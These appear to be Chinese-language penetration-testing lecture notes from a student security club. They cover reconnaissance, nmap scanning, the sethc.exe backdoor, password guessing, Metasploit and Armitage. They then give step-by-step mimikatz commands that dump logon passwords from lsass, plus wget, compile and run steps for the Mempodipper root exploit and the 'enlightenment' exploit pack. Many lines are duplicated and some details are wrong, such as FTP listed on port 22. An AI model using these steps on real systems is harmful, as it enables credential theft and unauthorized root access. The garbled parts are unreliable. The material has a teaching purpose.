NISRA_滲透測試 by Orange
滲透測試目的:
以駭客、攻擊者的眼光、手法,對系統進行安全測試
避免公司受他人攻擊而損失公司相關權益及機密
今日內容,基礎與概念為主。
認證過的道德駭客(白人)
標準很高→如:AllenOwn
入侵流程 :
1.Reconnaissance (Foot Printing) 找尋弱點
以駭客、攻擊者的眼光、手法,對系統進行安全測試
避免公司受他人攻擊而損失公司相關權益及機密
今日內容,基礎與概念為主。
認證過的道德駭客(白人)
標準很高→如:AllenOwn
入侵流程 :
1.Reconnaissance (Foot Printing) 找尋弱點
2.Scanning(掃描弱點)
3.Gaining Access(利用弱點浸入)
3.Gaining Access(利用弱點浸入)
4.Maintaining Access
5.Clearing Tracks(清除足跡)
雖然有這樣的入侵流程
也有迂迴性的滲透
雖然有這樣的入侵流程
也有迂迴性的滲透
一、 Reconnaissance
用盡一切方法拐到資訊
1.Google (人肉 GoogleHacking)
用盡一切方法拐到資訊
1.Google (人肉 GoogleHacking)
2.Who.is
3.DNS Zone transfer
目標是? 有沒有防火牆? IDS ...等等
總而言之
資訊越多,入侵機會越多
服務越多,入侵機會越多
入侵 HTML網站,單就HTML資訊→不容易找到弱點,因為資訊太少
About who.is
http://whois.sc/
http://whois365.com
總而言之
資訊越多,入侵機會越多
服務越多,入侵機會越多
入侵 HTML網站,單就HTML資訊→不容易找到弱點,因為資訊太少
About who.is
http://whois.sc/
http://whois365.com
二、Scanning
1.觀察、分析、思考
觀察有哪些服務提供,分析每個服務的來由,思考可能有甚麼弱點
2.Scanning Port
Port =
2.Scanning Port
Port =
範圍從1~65535
FTP :22
HTTP:80
FTP :22
HTTP:80
檢查Port有沒有開
Tool:NetCat (超好用) ─ 之前有過教學
Tool:NMAP Usage (資安必備)
安裝:http://nmap.org/dist/nmap-5.51-setup.exe
nmap -sT 127.0.0.1 # 起手式
nmap -sT 127.0.0.1-254 # IP range
nmap -sT -p 80 127.0.0.1 # 指定端口
nmap -sT -p 1-9 127.0.0.1 # Port range 掃所有服務
nmap -sT -v 127.0.0.1 # 詳細模式
nmap -A 127.0.0.1 # 檢測作業系統
Tool:NetCat (超好用) ─ 之前有過教學
Tool:NMAP Usage (資安必備)
安裝:http://nmap.org/dist/nmap-5.51-setup.exe
nmap -sT 127.0.0.1 # 起手式
nmap -sT 127.0.0.1-254 # IP range
nmap -sT -p 80 127.0.0.1 # 指定端口
nmap -sT -p 1-9 127.0.0.1 # Port range 掃所有服務
nmap -sT -v 127.0.0.1 # 詳細模式
nmap -A 127.0.0.1 # 檢測作業系統
3.弱點掃描
RDP後門 (port 3889)
-sethc.exe 連上遠端桌面第一件事不是打帳號,是快速按下五次shift
-sethc.exe 連上遠端桌面第一件事不是打帳號,是快速按下五次shift
4.猜密碼─空密碼 , 123456 , 帳號
三、Gaining Access
1. 關鍵點,請善用所有上一步取得的資訊
1. 關鍵點,請善用所有上一步取得的資訊
2. 存取權限分為Read Write eXecute
3. 失敗請退回上一步
漏洞網站
http://exploit-db.com
http://www.metasploit.com/
如果 metasploit 覺得很複雜可以試試 Artimage 提供一個更簡單一點介面操作 metasploit
3. 失敗請退回上一步
漏洞網站
http://exploit-db.com
http://www.metasploit.com/
如果 metasploit 覺得很複雜可以試試 Artimage 提供一個更簡單一點介面操作 metasploit
找到弱點後
msfjui可以自動幫你從漏洞攻擊
msfjui可以自動幫你從漏洞攻擊
Artimage 要用的話要裝 jre 唷 ^______<
http://www.fastandeasyhacking.com/download # Artimage 下載點
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
http://www.fastandeasyhacking.com/download # Artimage 下載點
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
四、放後門
# Mimikazt 下載點
http://orangee.tw/w/mimikatz_trunk.zip
下載後請開啟 cmd 後進入資料夾,看你是 32 位元還是 64 位元
(有 UAC 請記得以系統管理員權限執行 cmd.exe)
之後執行 mimikatz.exe 進入到它的介面
之後依序輸入
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
之後會跳出一堆東西,wdigest 那裏應該就是密碼。
http://www.webshell.cc/wp-content/uploads/image/2012/02/052115cYL.jpg # 範
http://orangee.tw/w/mimikatz_trunk.zip
下載後請開啟 cmd 後進入資料夾,看你是 32 位元還是 64 位元
(有 UAC 請記得以系統管理員權限執行 cmd.exe)
之後執行 mimikatz.exe 進入到它的介面
之後依序輸入
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
之後會跳出一堆東西,wdigest 那裏應該就是密碼。
http://www.webshell.cc/wp-content/uploads/image/2012/02/052115cYL.jpg # 範
有 Linux 的人可以試試 Linux 本地提權
Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
可以用
~$ uname -a #查看自己的 Linux 版本
輸入以下指令
~$ wget http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c
~$ gcc mempodipper.c -o mempodipper
~$ chmod +x mempodipper
~$ ./mempodier
假如你的主機存在漏洞的話應該會跳出一個 root shell 讓你從普通使用者變身 root
Linux 提權懶人包
http://grsecurity.net/~spender/exploits/enlightenment.tgz # 下載點
http://orangee.tw/w/enlightenment.tgz
~$ wget http://grsecurity.net/~spender/exploits/enlightenment.tgz
~$ tar -zxvf enlightenment.tgz
~$ cd enlightenment
~$ ./run_nonnull_exploits.sh 或者 ./run_null_exploits.sh
差別在於有些機器有上防護 patch 使得 null point 的攻擊不可成功。
安全的本質是甚麼?
http://hi.baidu.com/yuange1975/blog/item/08c3dddacc5c0cccb6fd48d2.html #文章地址
五、清犯罪足跡 (秘密)Orange@nisra.net
留言
張貼留言